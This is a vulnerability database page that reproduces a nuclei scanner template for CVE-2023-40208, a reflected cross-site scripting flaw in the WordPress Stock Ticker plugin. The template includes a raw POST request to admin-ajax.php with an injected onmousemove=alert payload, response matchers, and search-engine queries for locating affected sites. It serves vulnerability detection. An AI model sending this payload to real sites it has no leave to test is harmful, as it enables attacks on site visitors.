Lucene search
K

Stock Ticker <= 3.23.2 - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 47 Views

Stock Ticker plugin <= 3.23.2 - Cross-Site Scripting vulnerability in WordPres

Related
Refs
Code
id: CVE-2023-40208

info:
  name: Stock Ticker <= 3.23.2 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the class parameter in the ajax_stockticker_load function to execute attacks when users interact with malicious links.
  remediation: Fixed in version 3.23.3
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3233-reflected-cross-site-scripting
    - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-3-unauth-reflected-cross-site-scripting-xss-vulnerability
    - https://wordpress.org/plugins/stock-ticker/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40208
    - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-3-unauth-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-40208
    cwe-id: CWE-79
    epss-score: 0.0068
    epss-percentile: 0.4792
    cpe: cpe:2.3:a:urosevic:stock_ticker:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: urosevic
    product: stock_ticker
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/stock-ticker/
    fofa-query: body=/wp-content/plugins/stock-ticker/
    publicwww-query: /wp-content/plugins/stock-ticker/
  tags: cve2023,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss,urosevic,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=stockticker_load&symbols=MSFT&class=%22+onmousemove%3Dalert%28document.domain%29+

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "stock_ticker"
          - "onmousemove=alert(document.domain)"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e06c5507dd3a73ca38045272070c77d74dc9ccb356b4af70ce1a7d6c39005b7302200dccda5fb789775ce653f4572960fb23a75202c00da60ba6f8a1aae45d58c23e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.16.1 - 7.1
EPSS0.0068
SSVC
47